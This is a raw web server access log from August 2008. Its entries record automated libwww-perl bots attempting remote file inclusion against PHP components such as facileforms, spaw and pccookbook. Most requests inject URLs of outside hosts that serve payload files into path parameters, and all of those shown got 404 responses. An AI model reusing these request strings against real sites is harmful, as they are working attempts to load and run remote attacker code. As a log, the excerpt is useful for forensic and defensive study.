85.17.6.7 - - [30/Aug/2008:01:06:40 -0400] "GET /logs/error_log.Q108052100//modules/agendax/addevent.inc.php?agendax_path=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 257 "-" "libwww-perl/5.79"
200.49.100.20 - - [30/Aug/2008:01:07:12 -0400] "GET /logs/error_log.Q108081200//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://veldink.com/leqi/id.txt?? HTTP/1.1" 404 234 "-" "libwww-perl/5.69"
209.59.12.99 - - [30/Aug/2008:01:07:41 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.214.171.107 - - [30/Aug/2008:01:07:55 -0400] "GET /logs/access_log.Q108072300/errors.php?error=http://gaara.secretivens.com/a4? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
123.214.171.107 - - [30/Aug/2008:01:07:55 -0400] "GET /errors.php?error=http://gaara.secretivens.com/a4? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
123.214.171.107 - - [30/Aug/2008:01:07:56 -0400] "GET /logs/errors.php?error=http://gaara.secretivens.com/a4? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
218.38.54.160 - - [30/Aug/2008:01:07:56 -0400] "GET /logs/access_log.Q108071300//admin/spaw/spaw_control.class.php?spaw_root=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/gallery/warta.gif? HTTP/1.1" 404 259 "-" "libwww-perl/5.79"
218.38.54.160 - - [30/Aug/2008:01:07:57 -0400] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/gallery/warta.gif? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
218.38.54.160 - - [30/Aug/2008:01:07:58 -0400] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/gallery/warta.gif? HTTP/1.1" 404 237 "-" "libwww-perl/5.79"
200.53.114.42 - - [30/Aug/2008:01:08:25 -0400] "GET /logs/error_log.Q108071100//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 265 "-" "libwww-perl/5.76"
123.214.171.107 - - [30/Aug/2008:01:08:29 -0400] "GET /logs/error_log.Q108072300/errors.php?error=http://gaara.secretivens.com/a4? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
200.53.114.42 - - [30/Aug/2008:01:08:31 -0400] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://albcrew.t35.com/pw.txt? HTTP/1.1" 404 244 "-" "libwww-perl/5.76"
194.109.22.118 - - [30/Aug/2008:01:09:10 -0400] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 251 "-" "libwww-perl/5.79"
194.109.22.118 - - [30/Aug/2008:01:09:12 -0400] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 246 "-" "libwww-perl/5.79"
194.109.22.118 - - [30/Aug/2008:01:09:13 -0400] "GET /logs/error_log.Q108072400/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
194.109.22.118 - - [30/Aug/2008:01:09:14 -0400] "GET /logs/error_log.Q108062900/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
218.38.54.160 - - [30/Aug/2008:01:09:29 -0400] "GET /logs/error_log.Q108081500/phphtml.php?htmlclass_path=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/gallery/warta.gif? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
218.38.54.160 - - [30/Aug/2008:01:09:30 -0400] "GET /phphtml.php?htmlclass_path=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/gallery/warta.gif? HTTP/1.1" 404 209 "-" "libwww-perl/5.79"
218.38.54.160 - - [30/Aug/2008:01:09:30 -0400] "GET /logs/phphtml.php?htmlclass_path=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/gallery/warta.gif? HTTP/1.1" 404 214 "-" "libwww-perl/5.79"
221.130.201.43 - - [30/Aug/2008:01:09:38 -0400] "GET /logs/access_log.Q108080100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 272 "-" "libwww-perl/5.65"
221.130.201.43 - - [30/Aug/2008:01:09:40 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 245 "-" "libwww-perl/5.65"
221.130.201.43 - - [30/Aug/2008:01:09:42 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://monicaperalta.com.ar/principal//components/com_simpleboard/README?? HTTP/1.1" 404 250 "-" "libwww-perl/5.65"
194.109.22.118 - - [30/Aug/2008:01:10:02 -0400] "GET /logs/access_log.Q108072900/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 273 "-" "libwww-perl/5.79"
194.109.22.118 - - [30/Aug/2008:01:10:03 -0400] "GET /logs/error_log.Q108072900/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.kx-td.com/images/bo.do??? HTTP/1.1" 404 272 "-" "libwww-perl/5.79"
218.38.54.160 - - [30/Aug/2008:01:10:29 -0400] "GET /logs/error_log.Q108052100//admin/spaw/spaw_control.class.php?spaw_root=http://www.bapeda-jabar.go.id/bapeda_design/assets/images/gallery/warta.gif? HTTP/1.1" 404 258 "-" "libwww-perl/5.79" 220.73.137.93 - - [